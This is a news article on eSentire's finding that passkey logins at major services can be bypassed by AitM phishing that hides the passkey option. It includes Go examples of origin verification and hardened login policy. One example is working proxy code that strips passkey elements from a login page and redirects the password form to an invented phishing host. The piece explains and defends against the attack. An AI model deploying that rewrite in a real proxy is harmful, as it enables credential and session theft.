Passkey implementations by Google, Amazon, Microsoft vulnerable to AitM attacks, research

Attackers can proxy login pages, removing any mention of passkeys and prompting users to fall back to passwords, finds eSentire


Passkeys have surged in popularity in recent months as organisations recognise them as an effective way to combat phishing attacks, and with major tech companies such as Apple, Microsoft and Google promoting their adoption.

Passkeys are FIDO2/WebAuthn credentials (FIDO stands for Fast Identity Online) designed as a replacement for passwords. They work like hardware security keys, the best known being the YubiKey, except that the credential lives on the user's own device or in a platform account that syncs it between devices. As with a YubiKey, a passkey holds a private key that signs a challenge from the website to prove the user's identity, and the browser includes the site's origin in what gets signed, so a signature produced on a look-alike domain is worthless to the real site.

They are more secure than traditional passwords, which can be forgotten, guessed or reused across sites, and because of that origin binding they are an effective protection against phishing - provided the login flow around them is designed with the same care.
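To make the origin binding concrete, the following Go program is an added illustration and not code from eSentire or from any of the vendors named in this article. It models the WebAuthn assertion in simplified form (ECDSA P-256 over authenticatorData || SHA-256(clientDataJSON), with no CBOR, attestation or counter handling) and uses github.com as the relying party because that is the service in eSentire's demonstration; the proxy hostname github.com.evil-proxy.example is invented for the example.

```go
package main

import (
	"bytes"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
)

// clientData is the subset of WebAuthn clientDataJSON checked here. The browser
// writes Origin from the page's actual location; page script cannot choose it.
type clientData struct {
	Type      string `json:"type"`
	Challenge string `json:"challenge"`
	Origin    string `json:"origin"`
}

// Assertion is what navigator.credentials.get() hands back to the page.
type Assertion struct {
	AuthenticatorData, ClientDataJSON, Signature []byte
}

// signedMessage is what the authenticator signs: authenticatorData || SHA-256(clientDataJSON).
func signedMessage(authData, cdJSON []byte) []byte {
	h := sha256.Sum256(cdJSON)
	return append(append([]byte{}, authData...), h[:]...)
}

// Sign models the authenticator. rpID is the domain the browser derived from the
// page's origin; its hash forms the first 32 bytes of authenticatorData.
func Sign(priv *ecdsa.PrivateKey, origin, rpID, challenge string) (Assertion, error) {
	cdJSON, err := json.Marshal(clientData{Type: "webauthn.get", Challenge: challenge, Origin: origin})
	if err != nil {
		return Assertion{}, err
	}
	rpHash := sha256.Sum256([]byte(rpID))
	authData := append(rpHash[:], 0x01, 0, 0, 0, 0) // rpIdHash || flags (UP) || counter
	digest := sha256.Sum256(signedMessage(authData, cdJSON))
	sig, err := ecdsa.SignASN1(rand.Reader, priv, digest[:])
	return Assertion{authData, cdJSON, sig}, err
}

// Verify is the relying party: it accepts only an assertion made on its own
// origin, for its own RP ID, over the challenge it issued for this login.
func Verify(pub *ecdsa.PublicKey, a Assertion, wantOrigin, wantRPID, issued string) error {
	var cd clientData
	if err := json.Unmarshal(a.ClientDataJSON, &cd); err != nil {
		return err
	}
	if cd.Type != "webauthn.get" || cd.Challenge != issued {
		return errors.New("wrong ceremony type or challenge (replay?)")
	}
	if cd.Origin != wantOrigin {
		return fmt.Errorf("origin %q is not %q: assertion was made on another site", cd.Origin, wantOrigin)
	}
	rpHash := sha256.Sum256([]byte(wantRPID))
	if len(a.AuthenticatorData) < 37 || !bytes.Equal(a.AuthenticatorData[:32], rpHash[:]) {
		return errors.New("rpIdHash is not this relying party's")
	}
	digest := sha256.Sum256(signedMessage(a.AuthenticatorData, a.ClientDataJSON))
	if !ecdsa.VerifyASN1(pub, digest[:], a.Signature) {
		return errors.New("signature does not verify")
	}
	return nil
}

// Demo plays three logins against a relying party at github.com; the proxy hostname is invented.
func Demo() (genuine, proxied, tampered error) {
	const realOrigin, realRPID = "https://github.com", "github.com"
	const phishOrigin, phishRPID = "https://github.com.evil-proxy.example", "github.com.evil-proxy.example"
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return err, err, err
	}
	raw := make([]byte, 32)
	if _, err = rand.Read(raw); err != nil {
		return err, err, err
	}
	challenge := base64.RawURLEncoding.EncodeToString(raw) // fresh per login attempt
	attempt := func(origin, rpID string, forge bool) error {
		a, err := Sign(priv, origin, rpID, challenge)
		if err != nil {
			return err
		}
		if forge { // the proxy edits the signed fields to claim the real site
			a.ClientDataJSON = bytes.Replace(a.ClientDataJSON, []byte(phishOrigin), []byte(realOrigin), 1)
			realHash := sha256.Sum256([]byte(realRPID))
			copy(a.AuthenticatorData[:32], realHash[:])
		}
		return Verify(&priv.PublicKey, a, realOrigin, realRPID, challenge)
	}
	return attempt(realOrigin, realRPID, false), // user on the real site
		attempt(phishOrigin, phishRPID, false), // user on the proxy: browser reports the proxy's origin
		attempt(phishOrigin, phishRPID, true) // proxy rewrites the signed bytes
}

func main() { fmt.Println(Demo()) }
```

The second attempt fails on the origin check and the third on the signature: a proxy can neither relay an assertion made under its own domain nor patch one up to look genuine, which is exactly why attackers rewrite the page to avoid the passkey path rather than attack the passkey itself.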

But like any security tool, they are not perfect, and you can be sure that threat actors will always be seeking points of weakness.

Joe Stewart, principal security researcher at eSentire's Threat Response Unit, has reviewed the passkey implementations of prominent online services. In a blog post documenting his team's findings, Stewart said cybercriminals can gain access to accounts protected by passkeys on various online platforms, including banking and social media, by using Adversary-in-the-Middle (AitM) phishing attacks.

"In reviewing the implementation of several of the most popular software service's passkey authentication flow, nearly all of them can still be bypassed by AitM phishing, using authentication method redaction attacks," he wrote.

AitM attacks

AitM phishing attacks take advantage of the fact that most website passkey implementations still offer less secure fallback authentication methods, such as a password, even when a passkey has been added to the account. The passkey itself is not broken: the browser only lets it sign for the site it was registered to, so a proxy on a look-alike domain never obtains a usable assertion. Instead, the attacker manipulates the login page that the user sees, redacting every reference to passkey authentication in order to steer the user to the fallback method. Because the page is served through the attacker's proxy, this can be done by modifying the HTML, CSS, images or JavaScript of the login page in transit.

eSentire's researchers demonstrated the method with the open source Evilginx AitM toolkit, simulating a phishing attack against GitHub. Evilginx sits between the user and GitHub, relaying the real site but presenting the user with an altered login page from which the passkey option has been removed. A user who forgets that they usually sign in with a passkey is likely to fall back to username and password, which the proxy captures in transit, together with the session cookie GitHub issues once the login succeeds.
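The following Go program, added here as an illustration rather than eSentire's phishlet or Evilginx's own code, shows the kind of rewrite a proxy applies to a response body: it drops the elements that offer or mention a passkey and repoints the real hostname at the phishing host so that the password form posts back through the proxy. The login page is constructed for the example and the proxy hostname github.com.evil-proxy.example is invented.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// LoginPage is a constructed stand-in for a real sign-in page: a password form
// plus the passkey hint, button, link and script that an AitM proxy would strip.
const LoginPage = `<html><body>
<p class="hint">You usually sign in with a passkey on this device.</p>
<form action="https://github.com/session" method="post">
  <input name="login" placeholder="Username">
  <input name="password" type="password">
  <button type="submit">Sign in</button>
</form>
<div class="divider">or</div>
<button id="passkey-btn" type="button">Sign in with a passkey</button>
<a href="https://github.com/passkeys">Learn about passkeys</a>
<script>
document.getElementById("passkey-btn").onclick = async () => {
  const cred = await navigator.credentials.get({publicKey: await optionsFromServer()});
  await postAssertion(cred);
};
</script>
</body></html>`

// passkeyMarkers are the strings whose presence marks an element for removal.
var passkeyMarkers = []string{"passkey", "webauthn", "navigator.credentials"}

// elementPatterns match whole elements of the kinds a sign-in page uses to offer
// a passkey. RE2 has no backreferences, so each tag gets its own pattern; script
// blocks go first so their contents cannot confuse the simpler patterns.
var elementPatterns = []*regexp.Regexp{
	regexp.MustCompile(`(?is)<script\b[^>]*>.*?</script>`),
	regexp.MustCompile(`(?is)<button\b[^>]*>.*?</button>`),
	regexp.MustCompile(`(?is)<a\b[^>]*>.*?</a>`),
	regexp.MustCompile(`(?is)<p\b[^>]*>.*?</p>`),
}

// RedactPasskeys removes every matched element that mentions a passkey and
// reports how many it removed. The password form is left untouched.
func RedactPasskeys(page string) (string, int) {
	removed := 0
	for _, re := range elementPatterns {
		page = re.ReplaceAllStringFunc(page, func(el string) string {
			lower := strings.ToLower(el)
			for _, m := range passkeyMarkers {
				if strings.Contains(lower, m) {
					removed++
					return ""
				}
			}
			return el
		})
	}
	return page, removed
}

// ProxyRewrite is the response hook a proxy applies: redact the passkey option,
// then point every reference to the real host at the phishing host so the form
// posts back through the proxy rather than directly to the real site.
func ProxyRewrite(page, realHost, phishHost string) (string, int) {
	page, n := RedactPasskeys(page)
	return strings.ReplaceAll(page, realHost, phishHost), n
}

func main() {
	out, n := ProxyRewrite(LoginPage, "github.com", "github.com.evil-proxy.example")
	fmt.Printf("removed %d passkey elements\n%s\n", n, out)
}
```

Nothing in the rewritten page tells the user that a passkey option ever existed, and the only working control left is the password form, now addressed to the proxy. Note that no server-side check on the real site can see this rewrite, since the proxy speaks to the real site as an ordinary browser would.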

[Image: AitM attack on GitHub. Source: eSentire]

And it's not just GitHub that's vulnerable. Google's Gmail, Amazon's retail website (not AWS), eBay, the free consumer version of Microsoft Outlook email, DocuSign, CVS Pharmacy and Coinbase all have insecure fallbacks, Stewart told Computing.

"It is not that these companies have implemented the passkey technology itself incorrectly, but rather it is the way they offer alternate and less secure login methods for the user to choose from. And AitM allows the attacker to choose the method for them."

In offering alternative login methods, these vendors, many of which have actively promoted passkeys, are inadvertently sacrificing security for convenience.

"I believe from the very beginning, when the tech vendors and online retailers were developing their passkey implementations, they just were not thinking about the different ways a cybercriminal could get around their passkey login flow because it is assumed passkeys are just secure by default due to their features," Stewart told Computing.

"When they were designing their process, they simply did not consider how a hacker could use an AitM attack to take over a user's web session and manipulate anything the user sees in the browser tab while they are logging into their online account."

AitM attacks against passkeys are relatively easy to conduct, he added, "especially with the plethora of phishing proxy as-a-service solutions being sold on the hacker underground".

Remove the password option

Unfortunately there is no particularly easy solution. An account is only as phishing-resistant as the weakest login method the server will still accept, so the only alternatives are to make the fallback path itself phishing-resistant, for example by requiring a hardware security key on it, or to remove the fallback. Stewart recommends that services remove the password option altogether.

"The very best practice organisations can implement for sensitive and critical online accounts is to get rid of passwords entirely, and only provide the option for the account holder to use passkeys to access one's account," he said.

"However, to prevent users from being locked out of their account, platforms must make it mandatory that the user has at least two passkeys for each online account, stored separately."

But this puts a burden on the user that many companies will be unlikely to contemplate. Slightly less secure - but still better than the existing situation, and offering a way back in if all passkeys are lost - is sending a "warded link" by email or SMS. "This is similar to a magic link that would naturally break the user out of the AitM attack session but is additionally secured by other multifactor authentication methods for extra security," Stewart said.
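One way to encode that recommendation on the server, as an added example that is not eSentire's or any vendor's code: a single policy function decides which methods an account may use, the login page is rendered from it, and the login handler rejects any other method before it looks at the credential. The account fields, the two-passkey threshold and the stand-in verifiers are assumptions made for this example; the weak variant alongside it is the pattern the article describes, where whatever the client posts is checked on its own merits.

```go
package main

import (
	"errors"
	"fmt"
)

// Method names a login method the server understands.
type Method string

const (
	MethodPasskey  Method = "passkey"
	MethodPassword Method = "password"
)

// Account is the server-side record. Field names are constructed for this example.
type Account struct {
	Name        string
	PasskeyIDs  []string // enrolled credential IDs, ideally held on separate devices
	PasswordSet bool
}

// minPasskeysForPasswordless follows the recommendation above: keep the password
// until the user holds at least two passkeys stored separately, then drop it.
const minPasskeysForPasswordless = 2

// AllowedMethods is the one policy decision. The login page is rendered from it
// and Login enforces it, so a proxy that edits the page cannot widen what the
// server accepts.
func AllowedMethods(a Account) []Method {
	if len(a.PasskeyIDs) >= minPasskeysForPasswordless {
		return []Method{MethodPasskey}
	}
	var ms []Method
	if len(a.PasskeyIDs) > 0 {
		ms = append(ms, MethodPasskey)
	}
	if a.PasswordSet {
		ms = append(ms, MethodPassword)
	}
	return ms
}

// LoginRequest is whatever the client posted. Under AitM the attacker chose
// Method, so it is untrusted input, not a decision to honour.
type LoginRequest struct {
	Method       Method
	CredentialID string
	Password     string
}

// Verifiers stand in for the real checks (a WebAuthn library for assertions, a
// password-hash comparison for passwords), which are out of scope here.
type Verifiers struct {
	Passkey  func(a Account, credentialID string) bool
	Password func(a Account, password string) bool
}

var ErrMethodNotPermitted = errors.New("login method not permitted for this account")

// LoginAnyEnrolled is the weak pattern: any method the account has set up is
// accepted, so the attacker gets to pick the weakest one.
func LoginAnyEnrolled(a Account, req LoginRequest, v Verifiers) error {
	switch req.Method {
	case MethodPasskey:
		if len(a.PasskeyIDs) > 0 && v.Passkey(a, req.CredentialID) {
			return nil
		}
	case MethodPassword:
		if a.PasswordSet && v.Password(a, req.Password) {
			return nil
		}
	}
	return errors.New("authentication failed")
}

// Login is the hardened form: the method is checked against policy before the
// credential is looked at, so a correct password is refused outright once the
// account is passkey-only.
func Login(a Account, req LoginRequest, v Verifiers) error {
	permitted := false
	for _, m := range AllowedMethods(a) {
		permitted = permitted || m == req.Method
	}
	if !permitted {
		return fmt.Errorf("%w: %s", ErrMethodNotPermitted, req.Method)
	}
	return LoginAnyEnrolled(a, req, v)
}

// DemoVerifiers are constructed stand-ins: a passkey "verifies" if its ID is
// enrolled, and the only valid password is the constant below.
var DemoVerifiers = Verifiers{
	Passkey: func(a Account, id string) bool {
		for _, e := range a.PasskeyIDs {
			if e == id {
				return true
			}
		}
		return false
	},
	Password: func(_ Account, pw string) bool { return pw == "correct horse battery staple" },
}

func main() {
	alice := Account{Name: "alice", PasskeyIDs: []string{"cred-A", "cred-B"}, PasswordSet: true}
	req := LoginRequest{Method: MethodPassword, Password: "correct horse battery staple"}
	fmt.Println("weak:", LoginAnyEnrolled(alice, req, DemoVerifiers), "| hardened:", Login(alice, req, DemoVerifiers))
}
```

Because the permitted methods are derived from the account record rather than from what the client submitted, the redacted page is harmless: the proxy can show the victim a password form and even capture a correct password, but the server will not accept it.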

There is currently no perfect recovery method that is both secure and user-friendly, but understanding how AitM attacks against passkeys work, assuming every login session is compromised and improving workflows to reduce the probability of compromise can help teams improve security without sacrificing usability.